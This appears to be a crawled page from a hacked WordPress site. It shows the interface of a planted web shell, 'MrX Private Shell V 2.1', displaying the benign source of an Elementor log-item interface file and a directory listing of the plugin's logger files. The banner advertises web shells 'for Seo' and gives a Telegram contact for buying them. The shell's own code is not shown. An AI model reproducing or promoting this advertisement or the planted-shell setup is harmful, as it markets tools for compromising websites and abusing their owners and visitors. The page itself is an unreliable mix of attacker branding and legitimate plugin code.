__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Elementor\Core\Logger\Items;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
/**
* Interface Log_Item_Interface
*
* @package Elementor\Core\Logger
*
* @property string $date
* @property string $type
* @property string $message
* @property int $times
* @property array $meta
* @property array $times_dates
* @property array $args
*/
interface Log_Item_Interface extends \JsonSerializable {
const MAX_LOG_ENTRIES = 42;
/**
* Log_Item_Interface constructor.
*
* @param array $args
*/
public function __construct( $args );
/**
* @param string $name
*
* @return string
*/
public function __get( $name );
/**
* @return string
*/
public function __toString();
public static function from_json( $str );
/**
* @param string $format
* @return string
*/
public function format( $format = 'html' );
/**
* @return string
*/
public function get_fingerprint();
/**
* @param Log_Item_Interface $item
* @param bool $truncate
*/
public function increase_times( $item, $truncate = true );
/**
* @return string
*/
public function get_name();
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| base.php | File | 5.19 KB | 0664 |
|
| file.php | File | 1003 B | 0664 |
|
| js.php | File | 863 B | 0664 |
|
| log-item-interface.php | File | 1.13 KB | 0664 |
|
| php.php | File | 267 B | 0664 |
|